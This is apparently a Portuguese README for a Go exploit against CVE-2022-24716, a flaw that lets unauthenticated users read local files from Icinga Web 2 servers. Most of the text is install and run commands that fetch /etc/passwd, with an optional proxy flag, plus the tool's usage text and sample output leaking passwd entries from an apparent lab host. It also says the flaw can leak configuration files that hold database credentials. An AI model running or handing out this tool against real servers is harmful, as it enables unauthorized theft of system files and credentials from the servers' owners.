
CVE-2022-24716 (Divulgação Arbitrária de Arquivos Icingaweb2)
Icinga Web 2 é uma interface web de monitoramento de código aberto, um framework e uma interface de linha de comando. Usuários não autenticados podem vazar o conteúdo de arquivos locais do sistema acessíveis ao usuário a partir do servidor web, incluindo arquivos de configuração do icingaweb2 com credenciais de banco de dados.
O CVE-2022-24716 requer golang e, para baixá-lo, basta usar:
go install -v github.com/joaoviictorti/CVE-2022-24716@latest
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080
Isso exibirá a ajuda da ferramenta. Aqui estão todas as opções que ela suporta:
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
[-p|--proxy "<value>"]
CVE-2022-24716 - Arbitrary File Disclosure
Arguments:
-h --help Print help information
-u --url Insert url
-f --file Insert file
-p --proxy Insert proxy
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......